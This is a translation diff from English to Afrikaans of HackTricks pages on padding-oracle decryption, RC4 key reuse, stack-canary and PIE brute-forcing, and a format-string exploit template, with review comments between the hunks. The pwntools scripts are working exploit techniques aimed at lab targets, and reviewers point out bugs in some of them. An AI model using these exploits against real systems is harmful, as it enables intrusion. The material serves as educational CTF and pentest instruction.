Om die **laaste blok** (**E8** tot **E15**) te **ontsluit**, gaan die hele blok deur die "blok-sifer ontsluiting" wat die **tussengangerbyte I0 tot I15** genereer.\
|
||||
Uiteindelik word elke tussengangerbyte **XORed** met die vorige versleutelde bytes (E0 tot E7). So:
|
||||
|
||||
* `C15 = D(E15) ^ E7 = I15 ^ E7`
|
||||
* `C14 = I14 ^ E6`
|
||||
|
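Review bot: the cookie literals in the -plaintext paragraph were translated ("user=MyUsername" to "gebruiker=MyGebruikersnaam", "user=administrator" to "gebruiker=administrateur") while the command that follows still passes `-plaintext "user=administrator"`; prose and command now describe different values. Keep these literals exactly as in the English source, since they are application data rather than narrative text. The misspelling `paduster` (for padbuster) is carried over from the original and could be corrected in the same pass.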
@ -93,44 +83,42 @@ Finally, each intermediary byte is **XORed** with the previous encrypted bytes (
|
|||
* `C12 = I12 ^ E4`
|
||||
* ...
|
||||
|
||||
Now, It's possible to **modify `E7` until `C15` is `0x01`**, which will also be a correct padding. So, in this case: `\x01 = I15 ^ E'7`
|
||||
Nou is dit moontlik om **`E7` te wysig totdat `C15` `0x01` is**, wat ook 'n korrekte opvulling sal wees. Dus, in hierdie geval: `\x01 = I15 ^ E'7`
|
||||
|
||||
So, finding E'7, it's **possible to calculate I15**: `I15 = 0x01 ^ E'7`
|
||||
Dus, deur E'7 te vind, is dit **moontlik om I15 te bereken**: `I15 = 0x01 ^ E'7`
|
||||
|
||||
Which allow us to **calculate C15**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
|
||||
Dit stel ons in staat om **C15 te bereken**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
|
||||
|
||||
Knowing **C15**, now it's possible to **calculate C14**, but this time brute-forcing the padding `\x02\x02`.
|
||||
Wetende **C15**, is dit nou moontlik om **C14 te bereken**, maar hierdie keer deur die opvulling `\x02\x02` te kragtig te raai.
|
||||
|
||||
This BF is as complex as the previous one as it's possible to calculate the the `E''15` whose value is 0x02: `E''7 = \x02 ^ I15` so it's just needed to find the **`E'14`** that generates a **`C14` equals to `0x02`**.\
|
||||
Then, do the same steps to decrypt C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
|
||||
Hierdie BF is net so ingewikkeld as die vorige een, omdat dit moontlik is om die `E''15` te bereken, waarvan die waarde 0x02 is: `E''7 = \x02 ^ I15` dus hoef jy net die **`E'14`** te vind wat 'n **`C14` gelyk aan `0x02`** genereer.\
|
||||
Doen dan dieselfde stappe om C14 te ontsluit: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
|
||||
|
||||
**Follow this chain until you decrypt the whole encrypted text.**
|
||||
**Volg hierdie ketting totdat jy die hele versleutelde teks ontsluit.**
|
||||
|
||||
## Detection of the vulnerability
|
||||
## Opmerking van die kwesbaarheid
|
||||
|
||||
Register and account and log in with this account .\
|
||||
If you **log in many times** and always get the **same cookie**, there is probably **something** **wrong** in the application. The **cookie sent back should be unique** each time you log in. If the cookie is **always** the **same**, it will probably always be valid and there **won't be anyway to invalidate i**t.
|
||||
Registreer en rekeninge en teken in met hierdie rekening.\
|
||||
As jy **baie keer teken** en altyd dieselfde koekie kry, is daar waarskynlik **iets fout** in die toepassing. Die koekie wat teruggestuur word, moet elke keer wat jy teken, uniek wees. As die koekie **altyd** dieselfde is, sal dit waarskynlik altyd geldig wees en sal daar **geen manier wees om dit ongeldig te maak nie**.
|
||||
|
||||
Now, if you try to **modify** the **cookie**, you can see that you get an **error** from the application.\
|
||||
But if you BF the padding (using padbuster for example) you manage to get another cookie valid for a different user. This scenario is highly probably vulnerable to padbuster.
|
||||
Nou, as jy probeer om die **koekie te wysig**, kan jy sien dat jy 'n **fout** van die toepassing kry.\
|
||||
Maar as jy die opvulling BF (deur byvoorbeeld padbuster te gebruik), slaag jy daarin om 'n ander koekie te kry wat geldig is vir 'n ander gebruiker. Hierdie scenario is baie waarskynlik kwesbaar vir padbuster.
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
|
||||
* [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-klere**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
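Review bot: the heading "Detection of the vulnerability" became "Opmerking van die kwesbaarheid"; "opmerking" means a remark or comment, so it should be "Opsporing van die kwesbaarheid". In the same section, "Registreer en rekeninge en teken in met hierdie rekening" (the English "Register and account" is itself a typo for "Register an account") should read "Registreer 'n rekening en teken in met hierdie rekening". "deur die opvulling `\x02\x02` te kragtig te raai" is ungrammatical; "deur die opvulling `\x02\x02` met brute krag te raai" is the usual rendering of brute-forcing. Minor: the banner at the end of this file uses "haktruuks ... github-opslag" and "HackTricks-klere" while the other files in this commit use "hacking-truuks ... GitHub-opslagplekke" and "HackTricks swag"; pick one form.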
@ -1,23 +1,21 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
If you can somehow encrypt a plaintext using RC4, you can decrypt any content encrypted by that RC4 (using the same password) just using the encryption function.
|
||||
As jy op een of ander manier 'n platte teks kan enkripteer met RC4, kan jy enige inhoud wat deur daardie RC4 enkripteer is (met dieselfde wagwoord) dekripteer deur net die enkripsiefunksie te gebruik.
|
||||
|
||||
If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:
|
||||
As jy 'n bekende platte teks kan enkripteer, kan jy ook die wagwoord onttrek. Meer verwysings kan gevind word in die HTB Kryptos-masjien:
|
||||
|
||||
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
|
||||
|
||||
|
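Review bot: "plaintext" is rendered "platte teks" here, while the CBC and hash-extension files in the same commit use "duidelike teks" for the same term; use one term consistently across the translation. The substance of the sentence is preserved correctly: the point that the RC4 encryption function alone is enough to decrypt content produced with the same key is stated the same way in both languages, and the Kryptos embed link is left unchanged.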
@ -29,16 +27,14 @@ If you can encrypt a known plaintext you can also extract the password. More ref
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.

</details>

@ -1,16 +1,16 @@
# Emails Vulnerabilities
# E-poskwesbaarhede
@ -20,14 +20,14 @@ Other ways to support HackTricks:
@ -1,114 +1,109 @@
**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.**
**As jy te doen het met 'n binêre lêer wat beskerm word deur 'n kanarie en PIE (Position Independent Executable), moet jy waarskynlik 'n manier vind om dit te omseil.**

![](<../../.gitbook/assets/image (144).png>)

{% hint style="info" %}
Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\
However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting.
Let daarop dat **`checksec`** dalk nie kan vind dat 'n binêre lêer beskerm word deur 'n kanarie as dit staties gekompileer is en nie in staat is om die funksie te identifiseer nie.\
Jy kan egter handmatig hiervan bewus raak as jy vind dat 'n waarde aan die begin van 'n funksieoproep in die stapel gestoor word en hierdie waarde voor die uittrede nagegaan word.
{% endhint %}

# Brute force Canary

The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it (network service), because every time you connect to it **the same canary will be used**.
Die beste manier om 'n eenvoudige kanarie te omseil, is as die binêre lêer 'n program is wat **kindprosesse vorm elke keer as jy 'n nuwe verbinding** daarmee vestig (netwerkdienste), omdat elke keer as jy daarmee verbind, **dezelfde kanarie gebruik sal word**.

Then, the best way to bypass the canary is just to **brute-force it char by char**, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function **brute-forces an 8 Bytes canary (x64)** and distinguish between a correct guessed byte and a bad byte just **checking** if a **response** is sent back by the server (another way in **other situation** could be using a **try/except**):
Dan is die beste manier om die kanarie te omseil, om dit net **karakter vir karakter te brute force**, en jy kan uitvind of die gerade kanariebyte korrek was deur te kyk of die program afgekraak het of sy normale vloei voortgaan. In hierdie voorbeeld **brute force** die funksie **'n 8 byte kanarie (x64)** en onderskei tussen 'n korrek gerade byte en 'n slegte byte deur net te **kyk** of 'n **reaksie** deur die bediener teruggestuur word (in 'n **ander situasie** kan 'n **try/except** gebruik word):

## Example 1

This example is implemented for 64bits but could be easily implemented for 32 bits.
## Voorbeeld 1

Hierdie voorbeeld is geïmplementeer vir 64-bits, maar kan maklik geïmplementeer word vir 32-bits.
```python
from pwn import *

def connect():
r = remote("localhost", 8788)
r = remote("localhost", 8788)

def get_bf(base):
canary = ""
guess = 0x0
base += canary
canary = ""
guess = 0x0
base += canary

while len(canary) < 8:
while guess != 0xff:
r = connect()
while len(canary) < 8:
while guess != 0xff:
r = connect()

r.recvuntil("Username: ")
r.send(base + chr(guess))
r.recvuntil("Username: ")
r.send(base + chr(guess))

if "SOME OUTPUT" in r.clean():
print "Guessed correct byte:", format(guess, '02x')
canary += chr(guess)
base += chr(guess)
guess = 0x0
r.close()
break
else:
guess += 1
r.close()
if "SOME OUTPUT" in r.clean():
print "Guessed correct byte:", format(guess, '02x')
canary += chr(guess)
base += chr(guess)
guess = 0x0
r.close()
break
else:
guess += 1
r.close()

print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
return base

print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
return base

canary_offset = 1176
base = "A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary
```
## Voorbeeld 2

## Example 2

This is implemented for 32 bits, but this could be easily changed to 64bits.\
Also note that for this example the **program expected first a byte to indicate the size of the input** and the payload.

Dit is geïmplementeer vir 32-bits, maar dit kan maklik verander word na 64-bits.\
Merk ook op dat vir hierdie voorbeeld die **program verwag eers 'n byte om die grootte van die inset aan te dui** en die payload.
```python
from pwn import *

# Here is the function to brute force the canary
def breakCanary():
known_canary = b""
test_canary = 0x0
len_bytes_to_read = 0x21

for j in range(0, 4):
# Iterate up to 0xff times to brute force all posible values for byte
for test_canary in range(0xff):
print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")

# Send the current input size
target.send(len_bytes_to_read.to_bytes(1, "little"))
known_canary = b""
test_canary = 0x0
len_bytes_to_read = 0x21

# Send this iterations canary
target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))
for j in range(0, 4):
# Iterate up to 0xff times to brute force all posible values for byte
for test_canary in range(0xff):
print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")

# Scan in the output, determine if we have a correct value
output = target.recvuntil(b"exit.")
if b"YUM" in output:
# If we have a correct value, record the canary value, reset the canary value, and move on
print(" - next byte is: " + hex(test_canary))
known_canary = known_canary + test_canary.to_bytes(1, "little")
len_bytes_to_read += 1
break
# Send the current input size
target.send(len_bytes_to_read.to_bytes(1, "little"))

# Return the canary
return known_canary
# Send this iterations canary
target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))

# Scan in the output, determine if we have a correct value
output = target.recvuntil(b"exit.")
if b"YUM" in output:
# If we have a correct value, record the canary value, reset the canary value, and move on
print(" - next byte is: " + hex(test_canary))
known_canary = known_canary + test_canary.to_bytes(1, "little")
len_bytes_to_read += 1
break

# Return the canary
return known_canary

# Start the target process
target = process('./feedme')
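Review bot: in the two Python blocks of this hunk the added lines are byte-identical to the removed ones (for example `r = remote("localhost", 8788)` under `def connect():` appears once as removed and once as added), so the only change can be in leading whitespace, which this rendering does not show; please confirm the Afrikaans file keeps the function and loop bodies indented, otherwise neither example parses. Two defects the translation carries over from the original are worth fixing in the same pass: `connect()` never returns `r`, so `r = connect()` leaves `r` as `None` and the following `r.recvuntil("Username: ")` fails, and the last line reads `CANARY = u64(base_can[len(base_canary)-8:])` where the variable is `base_canary`. Both loops also stop one short: `while guess != 0xff` and `for test_canary in range(0xff)` never try `0xff` as a canary byte, so `range(0x100)` (and `guess <= 0xff`) is needed. Finally, the translated sentence "dezelfde kanarie gebruik sal word" uses the Dutch "dezelfde"; the Afrikaans form, already used later in this file, is "dieselfde".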
@ -118,24 +113,22 @@ target = process('./feedme')
canary = breakCanary()
log.info(f"The canary is: {canary}")
```
# Druk Kanarie

# Print Canary
'n Ander manier om die kanarie te omseil is om dit te **druk**.\
Stel jou 'n situasie voor waar 'n **program vatbaar** vir stapoorvloei 'n **puts**-funksie kan uitvoer wat na 'n **deel** van die **stapoorvloei** wys. Die aanvaller weet dat die **eerste byte van die kanarie 'n nulbyte** (`\x00`) is en die res van die kanarie **willekeurige** bytes is. Dan kan die aanvaller 'n oorvloei skep wat die stapoorvloei oorskryf totdat net die eerste byte van die kanarie oorbly.\
Dan roep die aanvaller die puts-funksionaliteit aan op die middel van die nutlading wat al die kanarie sal **druk** (behalwe die eerste nulbyte).\
Met hierdie inligting kan die aanvaller 'n nuwe aanval **skep en stuur**, met kennis van die kanarie (in dieselfde programsessie).

Another way to bypass the canary is to **print it**.\
Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.\
Then, the attacker **calls the puts functionalit**y on the middle of the payload which will **print all the canary** (except from the first null byte).\
With this info the attacker can **craft and send a new attack** knowing the canary (in the same program session)

Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.\
CTF example: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html)
Dit is duidelik dat hierdie taktiek baie **beperk** is, aangesien die aanvaller in staat moet wees om die **inhoud** van sy **nutlading** te **druk** om die **kanarie** uit te voer en dan 'n nuwe nutlading (in dieselfde programsessie) te skep en te **stuur** om die werklike stapoorvloei te veroorsaak.\
CTF-voorbeeld: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html)

# PIE

In order to bypass the PIE you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\
For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.**

To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program output something or it just doesn't crash. The **same function** as the provided for brute-forcing the canary can be used to brute-force the RBP and the RIP:
Om die PIE te omseil, moet jy **'n adres uitlek**. En as die binêre lêer nie enige adresse uitlek nie, is die beste om dit te doen om die **RBP en RIP wat in die stapel gestoor is, deur middel van bruto-krag** in die vatbare funksie te raai.\
Byvoorbeeld, as 'n binêre lêer beskerm word deur beide 'n **kanarie** en **PIE**, kan jy begin om die kanarie bruto-krag te gebruik, dan sal die **volgende** 8 byte (x64) die gestoorde **RBP** wees en die **volgende** 8 byte sal die gestoorde **RIP** wees.

Om die RBP en die RIP van die binêre lêer bruto-krag te gebruik, kan jy uitvind dat 'n geldige geradeerde byte korrek is as die program iets uitvoer of net nie afkraak nie. Dieselfde funksie as die een wat voorsien is vir die bruto-krag van die kanarie, kan gebruik word om die RBP en die RIP bruto-krag te gebruik:
```python
print("Brute-Forcing RBP")
base_canary_rbp = get_bf(base_canary)
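Review bot: in the translated "Druk Kanarie" paragraph, "om die kanarie uit te voer" renders "exfiltrate the canary" as "execute/export the canary"; "uit te lek" carries the source meaning and matches the "uitlek" wording the PIE paragraph below already uses for "leak". In the same PIE paragraph, "deur middel van bruto-krag te raai" and "die kanarie bruto-krag te gebruik" read as if the canary were being used as the force; since "brute force" is kept untranslated earlier in this file ("karakter vir karakter te brute force"), one consistent term throughout the page would be better.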
@ -144,41 +137,33 @@ print("Brute-Forcing RIP")
base_canary_rbp_rip = get_bf(base_canary_rbp)
RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])
```
## Kry basisadres

## Get base address

The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**.

From the **RBP** you can calculate **where are you writing your shell in the stack**. This can be very useful to know where are you going to write the string _"/bin/sh\x00"_ inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a **breakpoint after leaking the RBP** an check **where is your shellcode located**, then, you can calculate the distance between the shellcode and the RBP:
Die laaste ding wat jy nodig het om die PIE te oorwin, is om nuttige adresse van die uitgelekde adresse te bereken: die RBP en die RIP.

Vanaf die RBP kan jy bereken waar jy jou skulp in die stapel skryf. Dit kan baie nuttig wees om te weet waar jy die string _"/bin/sh\x00"_ binne die stapel gaan skryf. Om die afstand tussen die uitgelekde RBP en jou skulpkode te bereken, kan jy net 'n breekpunt plaas nadat die RBP uitgelek is en kyk waar jou skulpkode geleë is. Dan kan jy die afstand tussen die skulpkode en die RBP bereken:
```python
INI_SHELLCODE = RBP - 1152
```

From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP chain**.\
To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses:
Vanaf die **RIP** kan jy die **basisadres van die PIE-binêre lêer** bereken, wat jy nodig gaan hê om 'n **geldige ROP-ketting** te skep.\
Om die basisadres te bereken, voer eenvoudig `objdump -d vunbinary` uit en kyk na die ontleedde jongste adresse:

![](<../../.gitbook/assets/image (145).png>)

In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked _0x562002970**ecf** _ the base address is _0x562002970**000**_

In daardie voorbeeld kan jy sien dat slegs **1 byte en 'n half nodig is** om al die kode te lokaliseer, dus sal die basisadres in hierdie situasie die **uitgelekke RIP wees, maar eindig op "000"**. Byvoorbeeld, as jy _0x562002970**ecf**_ uitgelek het, is die basisadres _0x562002970**000**_.
```python
elf.address = RIP - (RIP & 0xfff)
```
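Review bot: the Afrikaans versions of the two "Get base address" paragraphs drop the bold markup the English lines carry (`**RBP**`, `**RIP**`, `**where are you writing your shell in the stack**`, `**breakpoint after leaking the RBP**`); the translated lines should keep the same emphasis as the source. On the content itself, `elf.address = RIP - (RIP & 0xfff)` only yields the base when the leaked return address lies within the first 0x1000 bytes of the binary, which is exactly the "only 1 Byte and a half is needed" assumption stated just above it; the general form is `elf.address = RIP - offset` with `offset` being the file offset of that return address as read from `objdump -d`, and since this is a translation pass it would be worth adding that caveat to both languages rather than only carrying the page-aligned shortcut over.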
@ -1,20 +1,16 @@
```python
from pwn import *
from time import sleep

|
|||
|
||||
|
||||
def connect_binary():
|
||||
global P, ELF_LOADED, ROP_LOADED
|
||||
global P, ELF_LOADED, ROP_LOADED
|
||||
|
||||
if LOCAL:
|
||||
P = process(LOCAL_BIN) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
if LOCAL:
|
||||
P = process(LOCAL_BIN) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
|
||||
elif REMOTETTCP:
|
||||
P = remote('10.10.10.10',1338) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
elif REMOTETTCP:
|
||||
P = remote('10.10.10.10',1338) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
|
||||
elif REMOTESSH:
|
||||
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
|
||||
P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(elf)# Find ROP gadgets
|
||||
elif REMOTESSH:
|
||||
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
|
||||
P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(elf)# Find ROP gadgets
|
||||
|
||||
|
||||
#######################################
|
||||
|
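Review bot: the `REMOTESSH` branch does `ROP_LOADED = ROP(elf)` while the other two branches use `ROP(ELF_LOADED)` and no `elf` is defined anywhere in this function; it raises `NameError` as soon as that branch is taken, in both the removed and the added lines, and should read `ROP_LOADED = ROP(ELF_LOADED)`. As in the earlier Python hunks, every added line here is identical to the removed line apart from leading whitespace that this rendering does not show, so confirm the translated file keeps the `if`/`elif` bodies indented, or `connect_binary` will not parse.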
@ -73,39 +69,39 @@ def connect_binary():
#######################################

def send_payload(payload):
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
log.info("payload = %s" % repr(payload))
if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
P.sendline(payload)
sleep(0.5)
return P.recv()
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
log.info("payload = %s" % repr(payload))
if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
P.sendline(payload)
sleep(0.5)
return P.recv()


def get_formatstring_config():
global P
global P

for offset in range(1,1000):
connect_binary()
P.clean()
for offset in range(1,1000):
connect_binary()
P.clean()

payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()
payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()

if b"41" in recieved:
for padlen in range(0,4):
if b"41414141" in recieved:
connect_binary()
payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()
print(recieved)
if b"42424242" in recieved:
log.info(f"Found offset ({offset}) and padlen ({padlen})")
return offset, padlen
if b"41" in recieved:
for padlen in range(0,4):
if b"41414141" in recieved:
connect_binary()
payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()
print(recieved)
if b"42424242" in recieved:
log.info(f"Found offset ({offset}) and padlen ({padlen})")
return offset, padlen

else:
connect_binary()
payload = b" " + payload
recieved = send_payload(payload).strip()
else:
connect_binary()
payload = b" " + payload
recieved = send_payload(payload).strip()


# In order to exploit a format string you need to find a position where part of your payload
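Review bot: `send_payload` prints "MAX LENGTH EXCEEDED" when `len(payload) > MAX_LENTGH` but still sends the payload, so an oversized format string goes out anyway and whatever the target truncates is silently used by `get_formatstring_config` and later by `FmtStr`; raising an exception there (or returning `None` and checking for it in the caller) would make the failure visible instead of producing a wrong offset. `MAX_LENTGH` and `recieved` are misspelled throughout the hunk; they are consistent within it, but `MAX_LENTGH` must match the spelling of its definition earlier in the file, which is not part of this diff. The leading-whitespace caveat from the previous hunk applies here as well.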
@ -138,10 +134,10 @@ log.info(f"Printf GOT address: {hex(P_GOT)}")

connect_binary()
if GDB and not REMOTETTCP and not REMOTESSH:
# attach gdb and continue
# You can set breakpoints, for example "break *main"
